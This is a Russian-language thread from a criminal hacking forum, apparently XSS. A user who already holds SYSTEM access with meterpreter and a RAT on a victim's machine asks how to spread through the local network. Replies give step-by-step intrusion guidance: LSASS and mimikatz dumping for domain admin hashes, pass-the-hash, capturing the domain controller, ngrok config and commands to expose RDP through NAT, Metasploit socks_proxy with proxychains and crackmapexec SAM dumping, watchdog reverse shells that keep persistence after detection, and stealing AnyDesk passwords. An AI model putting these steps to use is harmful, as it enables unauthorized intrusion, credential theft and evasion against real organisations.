• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc Продвижение по сети

doctordradd

(L3) cache
Пользователь
Регистрация
17.07.2020
Сообщения
153
Реакции
34
Депозит
0.00
Получен доступ к PC в локальной сети, права system, meterpreter + rat.
Чем сканировать, двигаться по сети, возможно ли с одного PC пробраться в другой через локальную сеть?
 
Вот некоторые ресурсы, которые должны вам помочь.

 
Возможно.
сними лсасс - стащи - декриптни, может там будет хеш ДА
пробрось сокс, попробуй захватить контроллер

просканить можешь мячиком или адванседом, нмапом.
 
Возможно.
сними лсасс - стащи - декриптни, может там будет хеш ДА
пробрось сокс, попробуй захватить контроллер

просканить можешь мячиком или адванседом, нмапом.
Извиняюсь, конечно
Что такое "хэш ДА"?
Что есть мячик и адвансед?
Доступ через метерпретер и рат, нет внц.
 
Извиняюсь, конечно
Что такое "хэш ДА"?
Что есть мячик и адвансед?
Доступ через метерпретер и рат, нет внц.
ДА - доменный администратор. Вот будет полезно по скану тоже
https://resources.infosecinstitute.com/topic/port-scanners/
А софт NetScan попробуй для скана сети
 
Извиняюсь, конечно
Что такое "хэш ДА"?
Что есть мячик и адвансед?
Доступ через метерпретер и рат, нет внц.
Ну мимик нтлм хеши.
Адванцед ип сканер и тому подобное.
 
Хэши есть, админа основного домена.
Адвансед ип нужно ж руками устанавливать, без рдп никак, доступ только через рат или метерпретер, проблема как раз в том, что уязвимый комп сидит за NAT и у него только по локалке прямой доступ, ipv4 идет как окальный
 
Спасибо
Ты можешь и через цмд сделать дамп лсасса, способов много, в зависимости от авера который у тебя попробуй как здесь тыц
хеш - NTLM хеш тыц и ТЫЦ Администратора домена
его потом брутишь с целью получения пароля или проводишь Path-the-Hash атаку
если пробросишь туда сокс, то через него можешь на рдп зайти и решить множество проблем
сокс пробрасывать лучше кобой но много ратников также умеют это делать
UPD: если там нету фаера можешь еще нгрок пробросить на 3389, и будет тебе рдп
 
UPD: если там нету фаера можешь еще нгрок пробросить на 3389, и будет тебе рдп
Открыт порт, все вроде работает, но из-за НАТа, прямого соединения нет. Хотя как таковая цель - удалённый доступ к mssql server. Та же самая проблема как с рдп, только по локалке доступ, но интернет есть.
Рат делает проброс соксов, только совсем нов в этом, проброс соксов означает, что можно будет подключаться извне к компу в локалке?
Спасибо за остальные ссылки, попробую
 
Открыт порт, все вроде работает, но из-за НАТа, прямого соединения нет. Хотя как таковая цель - удалённый доступ к mssql server. Та же самая проблема как с рдп, только по локалке доступ, но интернет есть.
Рат делает проброс соксов, только совсем нов в этом, проброс соксов означает, что можно будет подключаться извне к компу в локалке?
Спасибо за остальные ссылки, попробую
В твоем случае нгрок будет легче, регистрируйся тут
Скачивай exe, заливай на сервер
Создай конфигурационный файл рядом с exe config.yml

В конфиг вписывай
Код:
authtoken: твой токен из личного кабинета ngrok'а
tunnels:
    default:
        proto: tcp
        addr: 3389

Запускай через команду
Код:
ngrok.exe start --all --config="C:\Programdata\config.yml"
Выпадет ссылка в консоль, та же ссылка будет и в личном кабинете
Ее полностью вместе с портом, вставляешь в рдп клиент mstsc.exe, формат будет 0.tcp.ngrok.io:12345 ! БЕЗ tcp://

*это обходит NAT
 
Получен доступ к PC в локальной сети, права system, meterpreter + rat.
Чем сканировать, двигаться по сети, возможно ли с одного PC пробраться в другой через локальную сеть?
если у тебя там есть сессия meterpreter, то зачем все усложнять?
задача стоит получить доступ к локальной сети:
1. в метасплойте подними прокси
Код:
use auxiliary/server/socks_proxy
set srvport 40400
set version 4a
run

2. в конфиге proxychains укажи выбранный порт:
nano /etc/proxychains.conf

Код:
...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 40400

3. дальше работай с локальной сетью через прокси
proxychains remmina
proxychains firefox
proxychains python3 exploit.py 192.168.1.3
proxychains crackmapexec smb 192.168.1.3 -u admin -p pass --sam


если хочется с виндовой тачки к примеру сходить по рдп, то тебе поможет proxifier
указываешь внешний ип своего сервера с метасплойтом и порт, на котором поднял прокси)
 
В твоем случае нгрок будет легче, регистрируйся тут
Сделал всё, но не появился в endpoint клиент ngrok. В процессах висит, соединение established, но подключение к 8.8.8.8. порт 443, в панели ngrok не появляется
Стоит Sophos control center именно на компе с ipv4, т.е. если расшариваемый айпи просканить nmap, мне даже ссылку выдало на панель Софоса и там линукс, на расшариваемом pc - Windows server.
Может ли ав блочить нгрок?
 
Последнее редактирование:
сокс пробрасывать лучше кобой но много ратников также умеют это делать
Не могу поднять одного в сетках или я один так не делаю. Зачем именно кобой прокидывать сокс туда и открывать порты, подключаться по рдп? Что мешает заюзать тот же обычный сокс с гита или еще проще - реверсшелл с бекконектом.
И почему всегда открывать порты, пробрасывать траф через нат? Не легче ли энидеcк/тимку запустить в скрытном рабочем столе?
Как по мне проще - через лсасс продвигаться боком пока хеш админа не найдешь, после получения Pass the hash с закрепом реверсшелл открыть и при этом это не простой реверсшелл, а который будет работать в две сессии т.е. запускается две версии и одна следит за другим - в случае детекта все равно остается закреп.
 
Не могу поднять одного в сетках или я один так не делаю. Зачем именно кобой прокидывать сокс туда и открывать порты, подключаться по рдп? Что мешает заюзать тот же обычный сокс с гита или еще проще - реверсшелл с бекконектом.
И почему всегда открывать порты, пробрасывать траф через нат? Не легче ли энидеcк/тимку запустить в скрытном рабочем столе?
Как по мне проще - через лсасс продвигаться боком пока хеш админа не найдешь, после получения Pass the hash с закрепом реверсшелл открыть и при этом это не простой реверсшелл, а который будет работать в две сессии т.е. запускается две версии и одна следит за другим - в случае детекта все равно остается закреп.
Нет особо знаний в этом
Анидеск уже есть там на рабстоле, как пароли ее стащить?
Хэш админа есть, не удалось расшифровать
Сам рабстол чёрный экран, не видно ни хрена
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх